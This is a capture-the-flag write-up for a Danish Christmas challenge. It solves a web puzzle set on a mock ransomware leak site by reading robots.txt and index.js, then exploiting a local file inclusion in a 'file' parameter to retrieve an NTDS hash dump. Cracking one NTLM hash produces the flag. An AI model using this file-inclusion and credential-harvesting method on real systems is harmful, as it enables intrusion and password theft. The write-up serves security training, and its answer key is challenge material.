FDCA Xmas 2024 Day 22 - JætteBit 2.0

Challenge Description

Danish (original)

I et dristigt hack-back forsøg efter Jætterne har krypteret Æsirne, er du blevet udvalgt til at afdække svagheder hos den frygtede ransomwaregruppe JætteBit 2.0. Gruppen skulle angiveligt have terroriseret organisationer verden over, og nu er det tid til at gøre en ende på dem en gang for alle.

Din mission er simpel: Søg med lys og lygte efter cleartext credentials som kan bidrage til hack-back missionen. Måske har de været så ivrige efter at offentliggøre deres ofre, at de har glemt deres egen sikkerhed som kunne afsløre brugernavne, adgangskoder eller andre følsomme data, gemt i hemmelige filer.

Navigér forsigtigt på deres hjemmeside hvor de lækker data. Men vær varsom – jætterne er eksperter i at opsætte fælder for dem, der kommer for tæt på.

Held og lykke, og må du være den, der bringer Ragnarok til JætteBit 2.0!

Sitet kan findes på http://p9x6m4b2vqz7htfj.onion.jættenettet.dk

Flag er i formatet FDCA{username:password}

English (from chatgpt)

In a bold hack-back attempt after the Giants have encrypted the Aesir, you have been selected to uncover weaknesses in the feared ransomware group JætteBit 2.0. The group is said to have terrorized organizations worldwide, and now it’s time to put an end to them once and for all.

Your mission is simple: Search high and low for cleartext credentials that can contribute to the hack-back mission. Perhaps they have been so eager to publish their victims’ data that they’ve forgotten their own security, which could reveal usernames, passwords, or other sensitive data hidden in secret files.

Navigate carefully on their website where they leak data. But be cautious – the giants are experts at setting traps for those who get too close.

Good luck, and may you be the one to bring Ragnarok to JætteBit 2.0!

The site can be found at http://p9x6m4b2vqz7htfj.onion.jættenettet.dk

Flags are in the format FDCA{username:password}

Solution

Going to the provided website we are meet with a classical ransomware group website.

Checking robots.txt we can see that /backend is disallowed

$ curl "http://p9x6m4b2vqz7htfj.onion.jættenettet.dk/robots.txt"
User-agent: *
Disallow: /backend/

Having visited /backend and fighting with its interaction hooks, I have opted to research it using curl:

$ curl "http://p9x6m4b2vqz7htfj.onion.jættenettet.dk/backend"
[expunged for readability]
</body>
</html>
<script src="/index.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-3898076-24"></script>
<script>
[expunged for readability]

We can see that the page loads /index.js, so lets look at that:

$ curl "http://p9x6m4b2vqz7htfj.onion.jættenettet.dk/index.js"
[expunged for readability]
const hemmelige_filer = [
  'intern/hashrevision/jaette_ntds_hashes.txt'
]
[expunged for readability]

The file does a lot, but most important for us the hemmelige_filer (secret files) variable that seems to give a path to a file with ntds hashes. Sadly we cannot just visit /intern/hashrevision/jaette_ntds_hashes.txt to get it, so lets try and find another way.

Going back to the frontpage and clicking on one of the “Betal nu” (Pay now) button the url becomes the following: http://p9x6m4b2vqz7htfj.onion.jættenettet.dk/betal.php?file=betal.html, the ?file parameter here seems to indicate a possible LFI (local file inclusion) vulnerability.

So lets try http://p9x6m4b2vqz7htfj.onion.jættenettet.dk/betal.php?file=intern/hashrevision/jaette_ntds_hashes.txt, and bingo we get the hashes:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6c569aabbf7775ef8fc570e228c16b98:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jotunheimr:1001:aad3b435b51404eeaad3b435b51404ee:8d777f385d3dfec881f3f8e2d7b2b93b:::
surt:1002:aad3b435b51404eeaad3b435b51404ee:c4ca4238a0b923820dcc509a6f75849b:::
ymer:1003:aad3b435b51404eeaad3b435b51404ee:2c6ee24b09816a6f14f95d1698b24ead:::
skadi:1004:aad3b435b51404eeaad3b435b51404ee:9c56f361f0b66d4b2f4db0b74a5b5c2f:::
loki:1005:aad3b435b51404eeaad3b435b51404ee:9e107d9d372bb6826bd81d3542a419d6:::
angrboða:1006:aad3b435b51404eeaad3b435b51404ee:bad0c6db35173c1b63459db6a1a2a22e:::
fafnir:1007:aad3b435b51404eeaad3b435b51404ee:1f54deae0f9a2ba375c724235ffaaefd:::
hel:1008:aad3b435b51404eeaad3b435b51404ee:9d5ed678fe57bcca4ec8b7b6d4b1e3b7:::
krbtgt:65534:aad3b435b51404eeaad3b435b51404ee:bfb8d96e5176b084ee453de1e6d5a1d0:::

These are NTLM hashes, so we are actually only interested in the last hash value since the LM hash is the same, so lets cut the hash out:

$ cut -d':' -f4 jaette_ntds_hashes.txt
6c569aabbf7775ef8fc570e228c16b98
31d6cfe0d16ae931b73c59d7e0c089c0
8d777f385d3dfec881f3f8e2d7b2b93b
c4ca4238a0b923820dcc509a6f75849b
2c6ee24b09816a6f14f95d1698b24ead
9c56f361f0b66d4b2f4db0b74a5b5c2f
9e107d9d372bb6826bd81d3542a419d6
bad0c6db35173c1b63459db6a1a2a22e
1f54deae0f9a2ba375c724235ffaaefd
9d5ed678fe57bcca4ec8b7b6d4b1e3b7
bfb8d96e5176b084ee453de1e6d5a1d0

I will take these and use ntlm.pw to look them up:

We can see that one of the hashes is netcompany123, and looking back at jaette_ntds_hashes.txt we can see that fafnir owns this hash, so the flag is: FDCA{fafnir:netcompany123}